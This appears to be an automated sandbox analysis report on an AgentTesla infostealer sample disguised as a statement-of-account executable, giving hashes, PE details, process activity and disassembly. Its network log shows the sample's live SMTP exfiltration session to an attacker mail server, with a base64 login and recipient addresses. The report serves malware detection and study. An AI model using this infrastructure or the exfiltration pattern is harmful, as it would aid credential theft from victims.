                                    Preview:Microsoft (R) .NET Framework Services Installation Utility Version 4.8.4084.0..Copyright (C) Microsoft Corporation. All rights reserved.....USAGE: regsvcs.exe [options] AssemblyName..Options:.. /? or /help Display this usage message... /fc Find or create target application (default)... /c Create target application, error if it already exists... /exapp Expect an existing application... /tlb:<tlbfile> Filename for the exported type library... /appname:<name> Use the specified name for the target application... /parname:<name> Use the specified name or id for the target partition... /extlb Use an existing type library... /reconfig Reconfigure existing target application (default)... /noreconfig Don't reconfigure existing target application... /u Uninstall target application... /nologo Suppress logo output... /quiet Suppress logo output and success output... /c

                                    Static File Info

                                    General

                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                    Entropy (8bit):7.801650215912521
                                    TrID:
                                    • Win32 Executable (generic) a (10002005/4) 99.39%
                                    • UPX compressed Win32 Executable (30571/9) 0.30%
                                    • Win32 EXE Yoda's Crypter (26571/9) 0.26%
                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                    • DOS Executable Generic (2002/1) 0.02%
                                    File name:SOA_9828392091.exe
                                    File size:664'064 bytes
                                    MD5:180595851681bf165b09671519906dd1
                                    SHA1:2ddf0c1fd34ce5d9de9de60c39ce4b0b4ba7cac8
                                    SHA256:cc1e3f414454270d801d9dc8251ad2fc700476fdcce48da792fd48ff391f22e7
                                    SHA512:1d53d0b1c917289b82d952d1b41e01cb2b3f9738f2d2d66d6866e1beae97bb56ad05512e64563c1e8ce1275a9c3fbaf4f50eb26e7b967e0a71f0836fa92f1add
                                    SSDEEP:12288:ROv5jKhsfoPA+yeVKUCUxP4C902bdRtJJPikikEAmDuzLEPvI3j/ZBFyLhEJI83k:Rq5TfcdHj4fmbTjZkabZ+aJRk
                                    TLSH:2FE412E1B51ECD99FC4557B1087A9A60015B9F4D4C98920D30EE3F27B6B331328E6E6E
                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d..............'.a.....H.k.....H.h.....H.i......}%......}5...............~.......k.......o.......1.......j.....Rich...........

                                    File Icon

                                    Icon Hash:0fd88dc89ea7861b

                                    Static PE Info

                                    General

                                    Entrypoint:0x525f70
                                    Entrypoint Section:UPX1
                                    Digitally signed:false
                                    Imagebase:0x400000
                                    Subsystem:windows gui
                                    Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                    DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                    Time Stamp:0x6745051B [Mon Nov 25 23:15:39 2024 UTC]
                                    TLS Callbacks:
                                    CLR (.Net) Version:
                                    OS Version Major:5
                                    OS Version Minor:1
                                    File Version Major:5
                                    File Version Minor:1
                                    Subsystem Version Major:5
                                    Subsystem Version Minor:1
                                    Import Hash:ef471c0edf1877cd5a881a6a8bf647b9

                                    Entrypoint Preview

                                    Instruction
                                    pushad
                                    mov esi, 004D2000h
                                    lea edi, dword ptr [esi-000D1000h]
                                    push edi
                                    jmp 00007F32A0FD851Dh
                                    nop
                                    mov al, byte ptr [esi]
                                    inc esi
                                    mov byte ptr [edi], al
                                    inc edi
                                    add ebx, ebx
                                    jne 00007F32A0FD8519h
                                    mov ebx, dword ptr [esi]
                                    sub esi, FFFFFFFCh
                                    adc ebx, ebx
                                    jc 00007F32A0FD84FFh
                                    mov eax, 00000001h
                                    add ebx, ebx
                                    jne 00007F32A0FD8519h
                                    mov ebx, dword ptr [esi]
                                    sub esi, FFFFFFFCh
                                    adc ebx, ebx
                                    adc eax, eax
                                    add ebx, ebx
                                    jnc 00007F32A0FD851Dh
                                    jne 00007F32A0FD853Ah
                                    mov ebx, dword ptr [esi]
                                    sub esi, FFFFFFFCh
                                    adc ebx, ebx
                                    jc 00007F32A0FD8531h
                                    dec eax
                                    add ebx, ebx
                                    jne 00007F32A0FD8519h
                                    mov ebx, dword ptr [esi]
                                    sub esi, FFFFFFFCh
                                    adc ebx, ebx
                                    adc eax, eax
                                    jmp 00007F32A0FD84E6h
                                    add ebx, ebx
                                    jne 00007F32A0FD8519h
                                    mov ebx, dword ptr [esi]
                                    sub esi, FFFFFFFCh
                                    adc ebx, ebx
                                    adc ecx, ecx
                                    jmp 00007F32A0FD8564h
                                    xor ecx, ecx
                                    sub eax, 03h
                                    jc 00007F32A0FD8523h
                                    shl eax, 08h
                                    mov al, byte ptr [esi]
                                    inc esi
                                    xor eax, FFFFFFFFh
                                    je 00007F32A0FD8587h
                                    sar eax, 1
                                    mov ebp, eax
                                    jmp 00007F32A0FD851Dh
                                    add ebx, ebx
                                    jne 00007F32A0FD8519h
                                    mov ebx, dword ptr [esi]
                                    sub esi, FFFFFFFCh
                                    adc ebx, ebx
                                    jc 00007F32A0FD84DEh
                                    inc ecx
                                    add ebx, ebx
                                    jne 00007F32A0FD8519h
                                    mov ebx, dword ptr [esi]
                                    sub esi, FFFFFFFCh
                                    adc ebx, ebx
                                    jc 00007F32A0FD84D0h
                                    add ebx, ebx
                                    jne 00007F32A0FD8519h
                                    mov ebx, dword ptr [esi]
                                    sub esi, FFFFFFFCh
                                    adc ebx, ebx
                                    adc ecx, ecx
                                    add ebx, ebx
                                    jnc 00007F32A0FD8501h
                                    jne 00007F32A0FD851Bh
                                    mov ebx, dword ptr [esi]
                                    sub esi, FFFFFFFCh
                                    adc ebx, ebx
                                    jnc 00007F32A0FD84F6h
                                    add ecx, 02h
                                    cmp ebp, FFFFFB00h
                                    adc ecx, 02h
                                    lea edx, dword ptr [edi+ebp]
                                    cmp ebp, FFFFFFFCh
                                    jbe 00007F32A0FD8520h
                                    mov al, byte ptr [edx]

                                    Rich Headers

                                    Programming Language:
                                    • [ C ] VS2008 SP1 build 30729
                                    • [IMP] VS2008 SP1 build 30729
                                    • [ASM] VS2012 UPD4 build 61030
                                    • [RES] VS2012 UPD4 build 61030
                                    • [LNK] VS2012 UPD4 build 61030

                                    Data Directories

                                    NameVirtual AddressVirtual Size Is in Section
                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x1747b80x424.rsrc
                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x1270000x4d7b8.rsrc
                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x174bdc0x18.rsrc
                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x1261540x48UPX1
                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                    Sections

                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                    UPX00x10000xd10000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                    UPX10xd20000x550000x5420042610f9da24d545c5078f1951434ef01False0.9887368824294205data7.937168504837139IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                    .rsrc0x1270000x4e0000x4dc00c458294e5188d33f4162cefb19129c52False0.8154673683681672data7.5255971838055675IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                    Resources

                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                    RT_ICON0x1273540x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                    RT_ICON0x1274800x10828Device independent bitmap graphic, 128 x 256 x 32, image size 65536, resolution 60472 x 60472 px/mEnglishGreat Britain0.14468236129184905
                                    RT_STRING0xd4ca00x594OpenPGP Public KeyEnglishGreat Britain1.007703081232493
                                    RT_STRING0xd52340x68adataEnglishGreat Britain1.0065710872162486
                                    RT_STRING0xd58c00x490dataEnglishGreat Britain1.009417808219178
                                    RT_STRING0xd5d500x5fcdataEnglishGreat Britain1.0071801566579635
                                    RT_STRING0xd634c0x65cOpenPGP Public KeyEnglishGreat Britain1.0067567567567568
                                    RT_STRING0xd69a80x466dataEnglishGreat Britain1.0097690941385435
                                    RT_STRING0xd6e100x158dataEnglishGreat Britain1.0319767441860466
                                    RT_RCDATA0x137cac0x3c647data1.0003476615716729
                                    RT_GROUP_ICON0x1742f80x14dataEnglishGreat Britain1.25
                                    RT_GROUP_ICON0x1743100x14dataEnglishGreat Britain1.15
                                    RT_VERSION0x1743280xdcdataEnglishGreat Britain0.6181818181818182
                                    RT_MANIFEST0x1744080x3b0ASCII text, with CRLF line terminatorsEnglishGreat Britain0.5116525423728814

                                    Imports

                                    DLLImport
                                    KERNEL32.DLLLoadLibraryA, GetProcAddress, VirtualProtect, VirtualAlloc, VirtualFree, ExitProcess
                                    ADVAPI32.dllAddAce
                                    COMCTL32.dllImageList_Remove
                                    COMDLG32.dllGetSaveFileNameW
                                    GDI32.dllLineTo
                                    IPHLPAPI.DLLIcmpSendEcho
                                    MPR.dllWNetUseConnectionW
                                    ole32.dllCoGetObject
                                    OLEAUT32.dllVariantInit
                                    PSAPI.DLLGetProcessMemoryInfo
                                    SHELL32.dllDragFinish
                                    USER32.dllGetDC
                                    USERENV.dllLoadUserProfileW
                                    UxTheme.dllIsThemeActive
                                    VERSION.dllVerQueryValueW
                                    WININET.dllFtpOpenFileW
                                    WINMM.dlltimeGetTime
                                    WSOCK32.dllsocket

                                    Possible Origin

                                    Language of compilation systemCountry where language is spokenMap
                                    EnglishGreat Britain

                                    Network Behavior

                                    Suricata IDS Alerts

                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                    2024-11-26T08:22:11.519362+01002030171ET MALWARE AgentTesla Exfil Via SMTP1192.168.2.649699174.136.29.110587TCP
                                    2024-11-26T08:22:11.519362+01002839723ETPRO MALWARE Win32/Agent Tesla SMTP Activity1192.168.2.649699174.136.29.110587TCP

                                    Network Port Distribution

                                    TCP Packets

                                    TimestampSource PortDest PortSource IPDest IP
                                    Nov 26, 2024 08:22:21.669249058 CET49699587192.168.2.6174.136.29.110
                                    Nov 26, 2024 08:22:21.789387941 CET58749699174.136.29.110192.168.2.6
                                    Nov 26, 2024 08:22:21.789532900 CET49699587192.168.2.6174.136.29.110
                                    Nov 26, 2024 08:22:23.142518997 CET58749699174.136.29.110192.168.2.6
                                    Nov 26, 2024 08:22:23.142788887 CET49699587192.168.2.6174.136.29.110
                                    Nov 26, 2024 08:22:23.262973070 CET58749699174.136.29.110192.168.2.6
                                    Nov 26, 2024 08:22:23.514730930 CET58749699174.136.29.110192.168.2.6
                                    Nov 26, 2024 08:22:23.515893936 CET49699587192.168.2.6174.136.29.110
                                    Nov 26, 2024 08:22:23.636030912 CET58749699174.136.29.110192.168.2.6
                                    Nov 26, 2024 08:22:23.887940884 CET58749699174.136.29.110192.168.2.6
                                    Nov 26, 2024 08:22:23.889353037 CET49699587192.168.2.6174.136.29.110
                                    Nov 26, 2024 08:22:24.009515047 CET58749699174.136.29.110192.168.2.6
                                    Nov 26, 2024 08:22:24.272140980 CET58749699174.136.29.110192.168.2.6
                                    Nov 26, 2024 08:22:24.273101091 CET49699587192.168.2.6174.136.29.110
                                    Nov 26, 2024 08:22:24.393208981 CET58749699174.136.29.110192.168.2.6
                                    Nov 26, 2024 08:22:24.645201921 CET58749699174.136.29.110192.168.2.6
                                    Nov 26, 2024 08:22:24.645569086 CET49699587192.168.2.6174.136.29.110
                                    Nov 26, 2024 08:22:24.765588045 CET58749699174.136.29.110192.168.2.6
                                    Nov 26, 2024 08:22:25.065134048 CET58749699174.136.29.110192.168.2.6
                                    Nov 26, 2024 08:22:25.065340042 CET49699587192.168.2.6174.136.29.110
                                    Nov 26, 2024 08:22:25.185373068 CET58749699174.136.29.110192.168.2.6
                                    Nov 26, 2024 08:22:25.437561035 CET58749699174.136.29.110192.168.2.6
                                    Nov 26, 2024 08:22:25.438325882 CET49699587192.168.2.6174.136.29.110
                                    Nov 26, 2024 08:22:25.438376904 CET49699587192.168.2.6174.136.29.110
                                    Nov 26, 2024 08:22:25.438400984 CET49699587192.168.2.6174.136.29.110
                                    Nov 26, 2024 08:22:25.438421011 CET49699587192.168.2.6174.136.29.110
                                    Nov 26, 2024 08:22:25.558501005 CET58749699174.136.29.110192.168.2.6
                                    Nov 26, 2024 08:22:25.558515072 CET58749699174.136.29.110192.168.2.6
                                    Nov 26, 2024 08:22:25.558523893 CET58749699174.136.29.110192.168.2.6
                                    Nov 26, 2024 08:22:25.558554888 CET58749699174.136.29.110192.168.2.6
                                    Nov 26, 2024 08:22:25.897077084 CET58749699174.136.29.110192.168.2.6
                                    Nov 26, 2024 08:22:25.941140890 CET49699587192.168.2.6174.136.29.110
                                    Nov 26, 2024 08:23:59.597712040 CET49699587192.168.2.6174.136.29.110
                                    Nov 26, 2024 08:23:59.717631102 CET58749699174.136.29.110192.168.2.6
                                    Nov 26, 2024 08:24:00.172076941 CET58749699174.136.29.110192.168.2.6
                                    Nov 26, 2024 08:24:00.172219992 CET58749699174.136.29.110192.168.2.6
                                    Nov 26, 2024 08:24:00.172281027 CET49699587192.168.2.6174.136.29.110
                                    Nov 26, 2024 08:24:00.172281027 CET49699587192.168.2.6174.136.29.110
                                    Nov 26, 2024 08:24:00.293713093 CET58749699174.136.29.110192.168.2.6

                                    UDP Packets

                                    TimestampSource PortDest PortSource IPDest IP
                                    Nov 26, 2024 08:22:19.580657959 CET5937553192.168.2.61.1.1.1
                                    Nov 26, 2024 08:22:20.581919909 CET5937553192.168.2.61.1.1.1
                                    Nov 26, 2024 08:22:21.597753048 CET5937553192.168.2.61.1.1.1
                                    Nov 26, 2024 08:22:21.661988020 CET53593751.1.1.1192.168.2.6
                                    Nov 26, 2024 08:22:21.662036896 CET53593751.1.1.1192.168.2.6
                                    Nov 26, 2024 08:22:21.744158983 CET53593751.1.1.1192.168.2.6

                                    DNS Queries

                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                    Nov 26, 2024 08:22:19.580657959 CET192.168.2.61.1.1.10xe7fbStandard query (0)mail.palumalimited.comA (IP address)IN (0x0001)false
                                    Nov 26, 2024 08:22:20.581919909 CET192.168.2.61.1.1.10xe7fbStandard query (0)mail.palumalimited.comA (IP address)IN (0x0001)false
                                    Nov 26, 2024 08:22:21.597753048 CET192.168.2.61.1.1.10xe7fbStandard query (0)mail.palumalimited.comA (IP address)IN (0x0001)false

                                    DNS Answers

                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                    Nov 26, 2024 08:22:21.661988020 CET1.1.1.1192.168.2.60xe7fbNo error (0)mail.palumalimited.compalumalimited.comCNAME (Canonical name)IN (0x0001)false
                                    Nov 26, 2024 08:22:21.661988020 CET1.1.1.1192.168.2.60xe7fbNo error (0)palumalimited.com174.136.29.110A (IP address)IN (0x0001)false
                                    Nov 26, 2024 08:22:21.662036896 CET1.1.1.1192.168.2.60xe7fbNo error (0)mail.palumalimited.compalumalimited.comCNAME (Canonical name)IN (0x0001)false
                                    Nov 26, 2024 08:22:21.662036896 CET1.1.1.1192.168.2.60xe7fbNo error (0)palumalimited.com174.136.29.110A (IP address)IN (0x0001)false
                                    Nov 26, 2024 08:22:21.744158983 CET1.1.1.1192.168.2.60xe7fbNo error (0)mail.palumalimited.compalumalimited.comCNAME (Canonical name)IN (0x0001)false
                                    Nov 26, 2024 08:22:21.744158983 CET1.1.1.1192.168.2.60xe7fbNo error (0)palumalimited.com174.136.29.110A (IP address)IN (0x0001)false

                                    SMTP Packets

                                    TimestampSource PortDest PortSource IPDest IPCommands
                                    Nov 26, 2024 08:22:23.142518997 CET58749699174.136.29.110192.168.2.6220-fastest.vivawebhost.com ESMTP Exim 4.98 #2 Tue, 26 Nov 2024 02:22:22 -0500
                                    220-We do not authorize the use of this system to transport unsolicited,
                                    220 and/or bulk e-mail.
                                    Nov 26, 2024 08:22:23.142788887 CET49699587192.168.2.6174.136.29.110EHLO 138727
                                    Nov 26, 2024 08:22:23.514730930 CET58749699174.136.29.110192.168.2.6250-fastest.vivawebhost.com Hello 138727 [8.46.123.75]
                                    250-SIZE 52428800
                                    250-LIMITS MAILMAX=1000 RCPTMAX=50000
                                    250-8BITMIME
                                    250-PIPELINING
                                    250-PIPECONNECT
                                    250-AUTH PLAIN LOGIN
                                    250-STARTTLS
                                    250 HELP
                                    Nov 26, 2024 08:22:23.515893936 CET49699587192.168.2.6174.136.29.110AUTH login bm92bG92ZUBwYWx1bWFsaW1pdGVkLmNvbQ==
                                    Nov 26, 2024 08:22:23.887940884 CET58749699174.136.29.110192.168.2.6334 UGFzc3dvcmQ6
                                    Nov 26, 2024 08:22:24.272140980 CET58749699174.136.29.110192.168.2.6235 Authentication succeeded
                                    Nov 26, 2024 08:22:24.273101091 CET49699587192.168.2.6174.136.29.110MAIL FROM:<novlove@palumalimited.com>
                                    Nov 26, 2024 08:22:24.645201921 CET58749699174.136.29.110192.168.2.6250 OK
                                    Nov 26, 2024 08:22:24.645569086 CET49699587192.168.2.6174.136.29.110RCPT TO:<mullarred@gmail.com>
                                    Nov 26, 2024 08:22:25.065134048 CET58749699174.136.29.110192.168.2.6250 Accepted
                                    Nov 26, 2024 08:22:25.065340042 CET49699587192.168.2.6174.136.29.110DATA
                                    Nov 26, 2024 08:22:25.437561035 CET58749699174.136.29.110192.168.2.6354 Enter message, ending with "." on a line by itself
                                    Nov 26, 2024 08:22:25.438421011 CET49699587192.168.2.6174.136.29.110.
                                    Nov 26, 2024 08:22:25.897077084 CET58749699174.136.29.110192.168.2.6250 OK id=1tFptv-00000009Zho-0IEv
                                    Nov 26, 2024 08:23:59.597712040 CET49699587192.168.2.6174.136.29.110QUIT
                                    Nov 26, 2024 08:24:00.172076941 CET58749699174.136.29.110192.168.2.6221 fastest.vivawebhost.com closing connection

                                    Statistics

                                    CPU Usage

                                    Click to jump to process

                                    Memory Usage

                                    Click to jump to process

                                    High Level Behavior Distribution

                                    Click to dive into process behavior distribution

                                    Behavior

                                    Click to jump to process

                                    System Behavior

                                    General

                                    Target ID:0
                                    Start time:02:22:13
                                    Start date:26/11/2024
                                    Path:C:\Users\user\Desktop\SOA_9828392091.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Users\user\Desktop\SOA_9828392091.exe"
                                    Imagebase:0x930000
                                    File size:664'064 bytes
                                    MD5 hash:180595851681BF165B09671519906DD1
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.2125412515.00000000022C0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.2125412515.00000000022C0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: Windows_Trojan_AgentTesla_d3ac2b2f, Description: unknown, Source: 00000000.00000002.2125412515.00000000022C0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                    • Rule: MALWARE_Win_AgentTeslaV3, Description: AgentTeslaV3 infostealer payload, Source: 00000000.00000002.2125412515.00000000022C0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                    Reputation:low
                                    Has exited:true

                                    General

                                    Target ID:2
                                    Start time:02:22:14
                                    Start date:26/11/2024
                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Users\user\Desktop\SOA_9828392091.exe"
                                    Imagebase:0x7e0000
                                    File size:45'984 bytes
                                    MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000002.00000002.4576001997.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.4576001997.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                    • Rule: Windows_Trojan_AgentTesla_d3ac2b2f, Description: unknown, Source: 00000002.00000002.4576001997.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.4577127670.0000000002B41000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    Reputation:high
                                    Has exited:false

                                    General

                                    Target ID:4
                                    Start time:02:22:30
                                    Start date:26/11/2024
                                    Path:C:\Users\user\AppData\Roaming\yGbzOMp\yGbzOMp.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Users\user\AppData\Roaming\yGbzOMp\yGbzOMp.exe"
                                    Imagebase:0x660000
                                    File size:45'984 bytes
                                    MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Antivirus matches:
                                    • Detection: 0%, ReversingLabs
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:5
                                    Start time:02:22:30
                                    Start date:26/11/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff66e660000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:6
                                    Start time:02:22:38
                                    Start date:26/11/2024
                                    Path:C:\Users\user\AppData\Roaming\yGbzOMp\yGbzOMp.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Users\user\AppData\Roaming\yGbzOMp\yGbzOMp.exe"
                                    Imagebase:0x230000
                                    File size:45'984 bytes
                                    MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:7
                                    Start time:02:22:38
                                    Start date:26/11/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff66e660000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Disassembly

                                    Reset < >

                                      Execution Graph

                                      Execution Coverage:3.9%
                                      Dynamic/Decrypted Code Coverage:0.4%
                                      Signature Coverage:6.1%
                                      Total number of Nodes:2000
                                      Total number of Limit Nodes:54
                                      execution_graph 94040 9a19ba 94045 94c75a 94040->94045 94044 9a19c9 94053 93d7f7 94045->94053 94050 94c865 94051 94c881 94050->94051 94061 94d1fa 48 API calls _memcpy_s 94050->94061 94052 950f0a 52 API calls __cinit 94051->94052 94052->94044 94062 94f4ea 94053->94062 94055 93d818 94056 94f4ea 48 API calls 94055->94056 94057 93d826 94056->94057 94058 94d26c 94057->94058 94093 94d298 94058->94093 94061->94050 94064 94f4f2 __calloc_impl 94062->94064 94065 94f50c 94064->94065 94066 94f50e std::exception::exception 94064->94066 94071 95395c 94064->94071 94065->94055 94085 956805 RaiseException 94066->94085 94068 94f538 94086 95673b 47 API calls _free 94068->94086 94070 94f54a 94070->94055 94072 9539d7 __calloc_impl 94071->94072 94078 953968 __calloc_impl 94071->94078 94092 957c0e 47 API calls __getptd_noexit 94072->94092 94075 95399b RtlAllocateHeap 94076 9539cf 94075->94076 94075->94078 94076->94064 94078->94075 94079 9539c3 94078->94079 94080 953973 94078->94080 94083 9539c1 94078->94083 94090 957c0e 47 API calls __getptd_noexit 94079->94090 94080->94078 94087 9581c2 47 API calls 2 library calls 94080->94087 94088 95821f 47 API calls 5 library calls 94080->94088 94089 951145 GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 94080->94089 94091 957c0e 47 API calls __getptd_noexit 94083->94091 94085->94068 94086->94070 94087->94080 94088->94080 94090->94083 94091->94076 94092->94076 94094 94d2a5 94093->94094 94096 94d28b 94093->94096 94095 94d2ac RegOpenKeyExW 94094->94095 94094->94096 94095->94096 94097 94d2c6 RegQueryValueExW 94095->94097 94096->94050 94098 94d2e7 94097->94098 94099 94d2fc RegCloseKey 94097->94099 94098->94099 94099->94096 94100 9a19cb 94105 932322 94100->94105 94102 9a19d1 94138 950f0a 52 API calls __cinit 94102->94138 94104 9a19db 94106 932344 94105->94106 94139 9326df 94106->94139 94111 93d7f7 48 API calls 94112 932384 94111->94112 94113 93d7f7 48 API calls 94112->94113 94114 93238e 94113->94114 94115 93d7f7 48 API calls 94114->94115 94116 932398 94115->94116 94117 93d7f7 48 API calls 94116->94117 94118 9323de 94117->94118 94119 93d7f7 48 API calls 94118->94119 94120 9324c1 94119->94120 94147 93263f 94120->94147 94124 9324f1 94125 93d7f7 48 API calls 94124->94125 94126 9324fb 94125->94126 94176 932745 94126->94176 94128 932546 94129 932556 GetStdHandle 94128->94129 94130 9325b1 94129->94130 94131 9a501d 94129->94131 94133 9325b7 CoInitialize 94130->94133 94131->94130 94132 9a5026 94131->94132 94183 9792d4 53 API calls 94132->94183 94133->94102 94135 9a502d 94184 9799f9 CreateThread 94135->94184 94137 9a5039 CloseHandle 94137->94133 94138->94104 94185 932854 94139->94185 94143 93234a 94144 93272e 94143->94144 94235 9327ec 6 API calls 94144->94235 94146 93237a 94146->94111 94148 93d7f7 48 API calls 94147->94148 94149 93264f 94148->94149 94150 93d7f7 48 API calls 94149->94150 94151 932657 94150->94151 94236 9326a7 94151->94236 94154 9326a7 48 API calls 94155 932667 94154->94155 94156 93d7f7 48 API calls 94155->94156 94157 932672 94156->94157 94158 94f4ea 48 API calls 94157->94158 94159 9324cb 94158->94159 94160 9322a4 94159->94160 94161 9322b2 94160->94161 94162 93d7f7 48 API calls 94161->94162 94163 9322bd 94162->94163 94164 93d7f7 48 API calls 94163->94164 94165 9322c8 94164->94165 94166 93d7f7 48 API calls 94165->94166 94167 9322d3 94166->94167 94168 93d7f7 48 API calls 94167->94168 94169 9322de 94168->94169 94170 9326a7 48 API calls 94169->94170 94171 9322e9 94170->94171 94172 94f4ea 48 API calls 94171->94172 94173 9322f0 94172->94173 94174 9322f9 RegisterClipboardFormatW 94173->94174 94175 9a1fe7 94173->94175 94174->94124 94177 932755 94176->94177 94178 9a5f4d 94176->94178 94180 94f4ea 48 API calls 94177->94180 94241 97c942 50 API calls 94178->94241 94182 93275d 94180->94182 94181 9a5f58 94182->94128 94183->94135 94184->94137 94242 9799df 54 API calls 94184->94242 94203 932870 94185->94203 94188 932870 48 API calls 94189 932864 94188->94189 94190 93d7f7 48 API calls 94189->94190 94191 932716 94190->94191 94192 936a63 94191->94192 94193 936adf 94192->94193 94196 936a6f __NMSG_WRITE 94192->94196 94223 93b18b 94193->94223 94195 936ab6 _memcpy_s 94195->94143 94197 936ad7 94196->94197 94198 936a8b 94196->94198 94222 93c369 48 API calls 94197->94222 94210 936b4a 94198->94210 94201 936a95 94213 94ee75 94201->94213 94204 93d7f7 48 API calls 94203->94204 94205 93287b 94204->94205 94206 93d7f7 48 API calls 94205->94206 94207 932883 94206->94207 94208 93d7f7 48 API calls 94207->94208 94209 93285c 94208->94209 94209->94188 94211 94f4ea 48 API calls 94210->94211 94212 936b54 94211->94212 94212->94201 94215 94f4ea __calloc_impl 94213->94215 94214 95395c std::exception::_Copy_str 47 API calls 94214->94215 94215->94214 94216 94f50c 94215->94216 94217 94f50e std::exception::exception 94215->94217 94216->94195 94227 956805 RaiseException 94217->94227 94219 94f538 94228 95673b 47 API calls _free 94219->94228 94221 94f54a 94221->94195 94222->94195 94224 93b1a2 _memcpy_s 94223->94224 94225 93b199 94223->94225 94224->94195 94225->94224 94229 93bdfa 94225->94229 94227->94219 94228->94221 94230 93be0d 94229->94230 94234 93be0a _memcpy_s 94229->94234 94231 94f4ea 48 API calls 94230->94231 94232 93be17 94231->94232 94233 94ee75 48 API calls 94232->94233 94233->94234 94234->94224 94235->94146 94237 93d7f7 48 API calls 94236->94237 94238 9326b0 94237->94238 94239 93d7f7 48 API calls 94238->94239 94240 93265f 94239->94240 94240->94154 94241->94181 94243 933742 94244 93374b 94243->94244 94245 933769 94244->94245 94246 9337c8 94244->94246 94284 9337c6 94244->94284 94250 933776 94245->94250 94251 93382c PostQuitMessage 94245->94251 94248 9a1e00 94246->94248 94249 9337ce 94246->94249 94247 9337ab NtdllDefWindowProc_W 94270 9337b9 94247->94270 94298 932ff6 16 API calls 94248->94298 94252 9337d3 94249->94252 94253 9337f6 